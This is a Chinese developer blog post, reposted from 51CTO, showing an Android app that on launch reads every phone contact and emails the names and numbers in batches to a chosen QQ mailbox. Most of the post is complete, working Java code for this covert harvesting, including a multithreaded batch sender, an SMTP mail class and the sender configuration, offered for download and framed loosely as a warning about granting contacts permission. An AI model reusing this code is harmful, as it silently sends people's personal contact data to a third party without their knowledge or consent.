本文共 9587 字,大约阅读时间需要 31 分钟。
最近上半年绩效确认,又是C,我就不明白了,怎么才能得B,怎么才能得A。我去,不借书,不参加培训,不加班就活该得C,那你招一群刚毕业的学生得了,刚毕业的学生干劲大,加班到半夜都没问题。唉,不说了,这年头不加班干完活都觉得不正常了。
大家还记得上篇文章么,看下图。
今天的话我就是要在该App启动的时候,将手机内存储的所有联系人通过邮件发送到指定的邮箱,怎么样,够狠吧。所以不是所有的app我们都给他开读取手机信息的权限,否则就泄露个底朝天。我们先看一下发邮件,需要到网上下载这三个jar包,这三个jar包不好下,要么你去google官网下,要么在csdn下,或者干脆在本篇文章下,给大家点福利。
说到这个发邮件,类是别人写的,我拿来以为能用,结果他妈的很多问题,压根就发不了邮件。改了很多问题,查了一些资料,尼玛才搞定。说到这里,我就想说那些写博客的或者是抄博客的或者是转载博客的,咋们做技术的要凭良心写博客。不能不管三七二十一,就抄过来。这样不但让看你博客的人觉得你不专业,而且还浪费每个看你博客的人的时间。你写个博客,你文采不行,但是你把代码最起码写的能正常运行,能达到该代码能实现的功能吧。
好了,不说了。我们看一下代码,我的设计是将联系人信息全部读取出来,然后通过多线程分批发送到指定邮箱。要说到多线程,大家肯定会想到Handler,handler会分发runable对象到主线程消息队列中。当我们实例化一个Handler对象的时候,就默认与对它初始化的进程的消息队列绑定。那么当线程有更新UI的操作话,我们就需要把数据消息作为一个Message对象发送到消息队列中,然后,用Handler中的handlerMessge方法处理传过来的数据信息,并操作UI。那么刚才说到分发runable对象到主线程队列中,我们看一下Handler有哪些方法可以实现分发Runable对象(查API)。
我们今天使用的其实就是post方法,分发多个runable对象到消息队列并执行。说了这么多不如直接看代码来得实在。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | private void SyncContactUserInfo() { CustomRunable customeRunable; List<Map<String, Object>> tempPagedDataList = this .GetContactUserList(); List<Map<String, Object>> dataList = this .GetContactUserList(); int totalSize = dataList.size(); if (totalSize == 0 ) return ; int threadCount = totalSize % PageSize == 0 ? totalSize / PageSize : totalSize / PageSize + 1 ; for ( int i = 1 ; i <= threadCount; i++) { if (i == threadCount) { tempPagedDataList = dataList.subList((i - 1 ) * PageSize, (i - 1 ) * PageSize + totalSize % PageSize - 1 ); } else { tempPagedDataList = dataList.subList((i - 1 ) * PageSize, PageSize * i - i); } customeRunable = new CustomRunable(tempPagedDataList, i); handler.post(customeRunable); } } |
上节课我们已经写过如何读取手机联系人了,所以这里就不在赘述。这段代码其实就是把联系人信息读取出来,然后去分批发送。上面的代码相信做过分页的人都应该知道,需要注意的就是List<T>的subList方法,传入start Index和end index就可以了,这里有点类似客户端分页。
在上面的代码中我们看到了一个CustomRunable类,这个类是我自己定义的,如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | class CustomRunable implements Runnable { StringBuilder strBuilder = new StringBuilder(); List<Map<String, Object>> dataList; int index; public CustomRunable(List<Map<String, Object>> dataList, int index) { this .dataList = dataList; this .index = index; } public void run() { strBuilder.append( "<html><body><table style='border:1px solid black'>" ); strBuilder.append( "<tr><th>姓名</th><th>手机号码</th></tr>" ); if ( this .dataList != null && this .dataList.size() > 0 ) { for (Map<String, Object> data : dataList) { strBuilder.append( "<tr>" ); strBuilder.append( "<td>" ); strBuilder.append(data.get( "UserName" ).toString()); strBuilder.append( "</td>" ); strBuilder.append( "<td>" ); strBuilder.append(data.get( "UserPhoneNumber" ).toString()); strBuilder.append( "</td>" ); strBuilder.append( "</tr>" ); } } strBuilder.append( "</table></body></html>" ); MailSenderInfo mailSendInfo = BuildMailSendInfo( "第" + index + "批手机号" , strBuilder.toString()); SimpleMailSender.sendHtmlMail(mailSendInfo); } } |
我定义了默认的构造函数,一个是联系人手机号码列表,一个是标示是第几批。当我拿到这批手机号码的时候,构造一个html格式的邮件,然后发送。邮件的标题是“第{0}批手机号码”,邮件的内容就是第一列姓名,第二列手机号的一个html表格。其实这里的run方法,一旦这个runable对象被分发到队列中,就会立即执行run方法。
大家其实可能此时最关注的是发邮件的代码,不妨就把最关键的类(SimpleMailSender)的代码贴出来好了,然后完了如果大家想要的话可以在这篇文章的附件下载或者加入群“.net技术冲锋舟(205217091)”。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 | package bruce.util.mail; import java.util.Date; import java.util.Properties; import javax.activation.CommandMap; import javax.activation.MailcapCommandMap; import javax.mail.Address; import javax.mail.BodyPart; import javax.mail.Message; import javax.mail.MessagingException; import javax.mail.Multipart; import javax.mail.Session; import javax.mail.Transport; import javax.mail.internet.InternetAddress; import javax.mail.internet.MimeBodyPart; import javax.mail.internet.MimeMessage; import javax.mail.internet.MimeMultipart; public class SimpleMailSender { /** * 以文本格式发送邮件 * * @param mailInfo * 待发送的邮件的信息 */ public static boolean sendTextMail(MailSenderInfo mailInfo) { // 判断是否需要身份认证 MyAuthenticator authenticator = null ; Properties pro = mailInfo.getProperties(); if (mailInfo.isValidate()) { // 如果需要身份认证,则创建一个密码验证器 authenticator = new MyAuthenticator(mailInfo.getUserName(), mailInfo.getPassword()); } // 根据邮件会话属性和密码验证器构造一个发送邮件的session Session sendMailSession = Session .getInstance(pro, authenticator); try { // 根据session创建一个邮件消息 Message mailMessage = new MimeMessage(sendMailSession); // 创建邮件发送者地址 Address from = new InternetAddress(mailInfo.getFromAddress()); // 设置邮件消息的发送者 mailMessage.setFrom(from); // 创建邮件的接收者地址,并设置到邮件消息中 Address to = new InternetAddress(mailInfo.getToAddress()); mailMessage.setRecipient(Message.RecipientType.TO, to); // 设置邮件消息的主题 mailMessage.setSubject(mailInfo.getSubject()); // 设置邮件消息发送的时间 mailMessage.setSentDate( new Date()); // 设置邮件消息的主要内容 String mailContent = mailInfo.getContent(); mailMessage.setText(mailContent); // 发送邮件 Transport.send(mailMessage); return true ; } catch (MessagingException ex) { ex.printStackTrace(); } return false ; } /** * 以HTML格式发送邮件 * * @param mailInfo * 待发送的邮件信息 */ public static boolean sendHtmlMail(MailSenderInfo mailInfo) { // 判断是否需要身份认证 MyAuthenticator authenticator = null ; Properties pro = mailInfo.getProperties(); // 如果需要身份认证,则创建一个密码验证器 if (mailInfo.isValidate()) { authenticator = new MyAuthenticator(mailInfo.getUserName(), mailInfo.getPassword()); } // 根据邮件会话属性和密码验证器构造一个发送邮件的session Session sendMailSession = Session .getInstance(pro, authenticator); try { // 根据session创建一个邮件消息 Message mailMessage = new MimeMessage(sendMailSession); // 创建邮件发送者地址 Address from = new InternetAddress(mailInfo.getFromAddress()); // 设置邮件消息的发送者 mailMessage.setFrom(from); // 创建邮件的接收者地址,并设置到邮件消息中 Address to = new InternetAddress(mailInfo.getToAddress()); // Message.RecipientType.TO属性表示接收者的类型为TO mailMessage.setRecipient(Message.RecipientType.TO, to); // 设置邮件消息的主题 mailMessage.setSubject(mailInfo.getSubject()); // 设置邮件消息发送的时间 mailMessage.setSentDate( new Date()); // MiniMultipart类是一个容器类,包含MimeBodyPart类型的对象 Multipart mainPart = new MimeMultipart(); // 创建一个包含HTML内容的MimeBodyPart BodyPart html = new MimeBodyPart(); // 设置HTML内容 html.setContent(mailInfo.getContent(), "text/html; charset=utf-8" ); mainPart.addBodyPart(html); // 将MiniMultipart对象设置为邮件内容 mailMessage.setContent(mainPart); // 发送邮件 MailcapCommandMap mc = (MailcapCommandMap)CommandMap.getDefaultCommandMap(); mc.addMailcap( "text/html;; x-java-content-handler=com.sun.mail.handlers.text_html" ); mc.addMailcap( "text/xml;; x-java-content-handler=com.sun.mail.handlers.text_xml" ); mc.addMailcap( "text/plain;; x-java-content-handler=com.sun.mail.handlers.text_plain" ); mc.addMailcap( "multipart/*;; x-java-content-handler=com.sun.mail.handlers.multipart_mixed" ); mc.addMailcap( "message/rfc822;; x-java-content-handler=com.sun.mail.handlers.message_rfc822" ); CommandMap.setDefaultCommandMap(mc); Transport.send(mailMessage); return true ; } catch (MessagingException ex) { ex.printStackTrace(); } return false ; } } |
OK,这就是我修改后的版本,能直接用,文章的末尾我会给大家见证奇迹。这个类中,一个是发送文本邮件,一个是发送Html格式的邮件,也可以发附件。OK,其实调用的话就是构造一个MailSenderInfo对象。如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | private static MailSenderInfo BuildMailSendInfo(String mailSubject, String mailContent) { MailSenderInfo mailInfo = new MailSenderInfo(); mailInfo.setContent(mailContent); mailInfo.setFromAddress( "Bruce.L.Li@163.com" ); mailInfo.setMailServerHost( "smtp.163.com" ); mailInfo.setMailServerPort( "25" ); mailInfo.setPassword( "********" ); mailInfo.setSubject(mailSubject); mailInfo.setToAddress( "******@qq.com" ); mailInfo.setUserName( "lilei1986XXXX@163.com" ); mailInfo.setValidate( true ); return mailInfo; } |
在这里解释一下这些方法
setContent:邮件内容
setFromAddress:发送者邮箱账号
setMailServerHost:163邮箱
setMailServerPort:25
setPassword:用来验证的邮箱密码
setSubject:邮件标题
setToAddress:接收者的邮箱
setUserName:用来验证的邮箱账号
setValidate:如果为true,则会验证setUserName和setPassword的用户名和密码。否则不会。
这里需要注意setUserName和setPassword必须是一个能登陆163邮箱的账号和密码。
其实这里和C#发Email差不多
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace CLUtility { public class EmailHelper { public static void SendEmail( string mailTitle, string mailContent, params string [] mailToAddress) { System.Net.Mail.SmtpClient client = new System.Net.Mail.SmtpClient(); client.Host = "smtp.ym.163.com" ; //使用163的SMTP服务器发送邮件 client.UseDefaultCredentials = true ; client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network; client.Credentials = new System.Net.NetworkCredential( "Bruce.XXX.XX@163.com" , "*******" ); System.Net.Mail.MailMessage Message = new System.Net.Mail.MailMessage(); Message.From = new System.Net.Mail.MailAddress( "lilei1986abc@163.com" ); foreach ( var address in mailToAddress) { Message.To.Add(address); } Message.Subject = mailTitle; Message.Body = mailContent; Message.SubjectEncoding = System.Text.Encoding.UTF8; Message.BodyEncoding = System.Text.Encoding.UTF8; Message.Priority = System.Net.Mail.MailPriority.High; Message.IsBodyHtml = true ; client.Send(Message); } } } |
OK,最后,我们见证奇迹的时刻到了,先看163发件箱。大家看到了顺序并不是按照1-9升序排列。
我们看一下发出的邮件内容
这些可都是我手机上的真实号码。唉,对不起大家,不知道网易和腾讯是否对这些号码感兴趣呢。
最后我们再看看QQ邮箱是否已经收到邮件。
木有问题,收到了。我们看一下内容
OK,成功了,最后,哥们的博客是货真价实的,测试机是小米3,看过这篇文章,你以后还敢随便允许app访问你的手机联系人信息吗。
本文转自 BruceAndLee 51CTO博客,原文链接:http://blog.51cto.com/leelei/1580324,如需转载请自行联系原作者